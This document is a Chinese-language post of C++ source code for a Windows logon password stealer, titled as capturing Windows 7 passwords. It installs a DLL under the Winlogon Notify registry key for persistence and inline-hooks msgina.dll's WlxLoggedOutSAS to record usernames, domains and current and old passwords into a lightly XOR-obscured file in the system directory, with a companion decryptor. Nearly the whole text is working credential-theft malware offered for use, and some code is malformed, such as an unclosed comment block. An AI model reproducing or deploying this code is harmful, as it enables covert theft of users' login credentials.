基于VC++2010实现截获Windows 7密码
Windows外壳,安装Windows密码截获器
void dey()//解密
{
printf("/r/n请不要移动原密码文件!");
system("pause");
char buffer[10000];
ZeroMemory(buffer,10000);
char LogPath[255] = {0};
GetSystemDirectory( LogPath , MAX_PATH);
lstrcat( LogPath, "//pwd.txt");
HANDLE hfile = CreateFile(
LogPath,
GENERIC_READ,
FILE_SHARE_WRITE,
0,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
0);
if(!hfile)
{
printf("打开文件失败!");
return;
}
DWORD st;
int a=ReadFile(hfile,buffer,10000,&st,0);
if(!a)
{
printf("读取失败!");
return;
}
for(int i = 0;i<strlen(buffer);i++)
{
buffer[i]=buffer[i]^3;
}
printf("解密内容为:/r/n%s",buffer);
return;
}
bool installed(); //判断是否已经安装
void installe() //安装函数
{
if(installed())
{
printf("已经安装过了!");
return;
}
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_DLL1), "dll");
dwSize = SizeofResource(NULL, hResInfo);
hResData = LoadResource(NULL, hResInfo);
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);//定位资源
char pfile[200];
GetWindowsDirectory(pfile, 200);
strcat(pfile,"//GetPwd.dll");//C:/WINDOWS/
hFile = CreateFile(pfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
WriteFile(hFile, (LPCVOID)p,dwSize, &dwWritten, NULL);
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
HKEY hkey;
if(ERROR_SUCCESS==RegCreateKey(HKEY_LOCAL_MACHINE,
"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd//",
&hkey)
)
{
char * name3 ="dog";
RegSetValueEx(hkey,"dllname",0,REG_SZ,(const unsigned char *)pfile,strlen(pfile));
RegSetValueEx(hkey,"startup",0,REG_SZ,(const unsigned char *)name3,strlen("dog"));
printf("安装成功!");
}
else
{
printf("安装失败!");
return;
}
}
bool installed()
{
HKEY hkey;
char sz[256];
DWORD dwtype, sl = 256;
if(ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd",
NULL, KEY_ALL_ACCESS, &hkey) //打开失败,表示没有安装
)
{
RegCloseKey(hkey);
return false;
}
RegCloseKey(hkey);
return true;
}
void usag()//用法提示
{
printf("example:/r/n");
printf("/r/n Install: getpwd.exe installe");
printf("/r/n Decryp : getpwd.exe Decryp /r/n");
}
int main(int argc, char* argv[])
{
if(!lstrcmpi(argv[1],"installe"))//
{
installe();
return 0;
}
else if(!lstrcmpi(argv[1], "Decryp"))
{
dey();
return 0;
}
usag();
return 0;
}
密码截获
#define WLX_SAS_ACTION_LOGON (1)
DWORD WINAPI StartHook(LPVOID lpParameter);
typedef struct _WLX_MPR_NOTIFY_INFO {
PWSTR pszUserName;
PWSTR pszDomain;
PWSTR pszPassword;
PWSTR pszOldPassword;
} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
typedef int (WINAPI* WlxLoggedOutSAS)(
//定义函数原型,以便将数据转发给系统
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSIDpLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,
PVOID * pProfile
);
int WINAPI FunNewADDR(
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSID pLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO prNotifyInfo,
PVOID * pProfile);
//自定义接管WlxLoggedOutSAS的函数,形参保持一致
void WriteLog(
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo
);//声明保存用户名密码函数原型
int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi);
void WriteCurrentTime();
void HookWlxLoggedOutSAS();
//执行HOOK
void UnHookWlxLoggedOutSAS();
//撤销HOOK
bool isWin2K()//判断操作系统版本
{
DWORD winVer;
OSVERSIONINFO *osvi;
winVer=GetVersion();
if(winVer<0x80000000)
{
osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO));
if (osvi!=NULL)
{
memset(osvi,0,sizeof(OSVERSIONINFO));
osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(osvi);
if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L)
{
free(osvi);
return true;
}
}
}
free(osvi);
return false;
}
#pragma pack(1)//对齐字节
struct HookTable{
HMODULEhMsgina;
WlxLoggedOutSAS OldDDR;
WlxLoggedOutSAS NewADDR;
unsigned charOldCode[6];
unsigned charJmpCode[6];
};//自定义的结构体
HookTable hooktable = {
0 ,
0 ,
&FunNewADDR ,
"/x8B/xFF/x55/x8B/xEC", //前5个字节
"/xE9/x00/x00/x00/x00" //e9 ,jmp
};
/*
#pragma pack()
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
if(isWin2K())
//win2K和xp、2003的前五个字节不同
{
hooktable.OldCode[0] ='/x55';
hooktable.OldCode[1] ='/x8B';
hooktable.OldCode[2] ='/xEC';
hooktable.OldCode[3] ='/x83';
hooktable.OldCode[4] ='/xEC';
}
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
HANDLE hthread = CreateThread( 0 ,
0 ,
LPTHREAD_START_ROUTINE(StartHook) ,
0 ,
0 ,
0);
CloseHandle( hthread );
break;
}
return TRUE;
}
DWORD WINAPI StartHook(LPVOID lpParameter)
{
hooktable.hMsgina = GetModuleHandle( _T("msgina.dll"));
if ( hooktable.hMsgina == NULL)
{
return 0 ;
}
hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") );
//得到原始函数地址,等下撤销HOOK会用到
if (hooktable.OldDDR == NULL)
{
return 0 ;
}
unsigned char *p = (unsigned char *)hooktable.OldDDR;
int *OpCode = (int *)&hooktable.JmpCode[1];//
int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
void HookWlxLoggedOutSAS()
{
DWORD OldProtect = NULL;
VirtualProtect( hooktable.OldDDR ,
5 ,
PAGE_EXECUTE_READWRITE ,
&OldProtect
);//内存访问权限
unsigned char *p = (unsigned char *)hooktable.OldDDR;
for (int i=0 ; i < 5 ; i++ )
{
p[i] = hooktable.JmpCode[i];
}
VirtualProtect( hooktable.OldDDR ,
5 ,
OldProtect ,
&OldProtect
);
return;
}
void UnHookWlxLoggedOutSAS()
{
DWORD OldProtect = NULL;
VirtualProtect( hooktable.OldDDR ,
5 ,
PAGE_EXECUTE_READWRITE ,
&OldProtect );
unsigned char *p = (unsigned char *)hooktable.OldDDR;
for (int i=0 ; i < 5 ; i++ )
{
p[i] = hooktable.OldCode[i];
}
VirtualProtect( hooktable.OldDDR ,
5 ,
OldProtect ,
&OldProtect );
return;
}
char pBuffer[1124];
void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)
//主要是一些文件操作
{
int size_u = lstrlenW( pNprNotifyInfo->pszUserName );
size_u += lstrlenW( pNprNotifyInfo->pszDomain );
size_u += lstrlenW( pNprNotifyInfo->pszPassword );
size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );
unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
char pBuffer1[1124];
char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );
ZeroMemory( pWBuffer , size_u + 1024 );
ZeroMemory( pBuffer , size_u + 1024 );
ZeroMemory( pBuffer1 , size_u + 1024 );
if ( !pBuffer )
{
return;
}else
{
WriteCurrentTime();
wsprintfW( pWBuffer ,
L"/r/nUser= %s /r/nDomain = %s/r/nPassWord = %s /r/nOldPass = %s/r/n" ,
pNprNotifyInfo->pszUserName ,
pNprNotifyInfo->pszDomain ,
pNprNotifyInfo->pszPassword,
pNprNotifyInfo->pszOldPassword
);
WideToByte( pBuffer ,
pWBuffer ,
lstrlenW( pWBuffer )
);
}
char LogPath[MAX_PATH] = {0};
GetSystemDirectory( LogPath , MAX_PATH);
lstrcat( LogPath , "//pwd.txt");
HANDLE hfile = CreateFile(
LogPath ,
GENERIC_WRITE ,
FILE_SHARE_WRITE ,
0 ,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL ,
0 );
if (hfile != INVALID_HANDLE_VALUE)
{
unsigned long ret;
SetFilePointer( hfile , -1 , 0 , FILE_END);
int i=0;
SYSTEMTIME st;
int b;
for(;i<strlen(pBuffer);i++)
{
pBuffer[i] = pBuffer[i] ^ 3;//加密采用异或方式
}
WriteFile( hfile , pBuffer , lstrlen( pBuffer ) , &ret , 0 );
CloseHandle( hfile );
}
GlobalFree( pWBuffer );
GlobalFree( pBuffer );
return;
}
void WriteCurrentTime()
{
SYSTEMTIME st;
DWORD ret = 0;
GetLocalTime(&st);
wsprintf( pBuffer , "/r/n%d/%d/%d/%d:%d:%d" ,
st.wYear ,
st.wMonth ,
st.wDay ,
st.wHour ,
st.wMinute,
st.wSecond
);
}
int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi)
{
return WideCharToMultiByte( CP_ACP ,
WC_COMPOSITECHECK ,
sz_source ,
-1 ,
sz_target ,
size_ansi ,
0 ,
0 );
}
int WINAPI FunNewADDR(
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSIDpLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,
PVOID * pProfile
)
{
UnHookWlxLoggedOutSAS();
//当系统jmp到我们自己的函数时先解除HOOK
int i = hooktable.OldDDR(pWlxContext ,
dwSasType ,
pAuthenticationId , pLogonSid ,
pdwOptions ,
phToken ,
pNprNotifyInfo,
pProfile
);
if (i == WLX_SAS_ACTION_LOGON )//
{
WriteLog( pNprNotifyInfo );
}
return i;
}
extern "C" __declspec(dllexport) void start()
{
return;
}
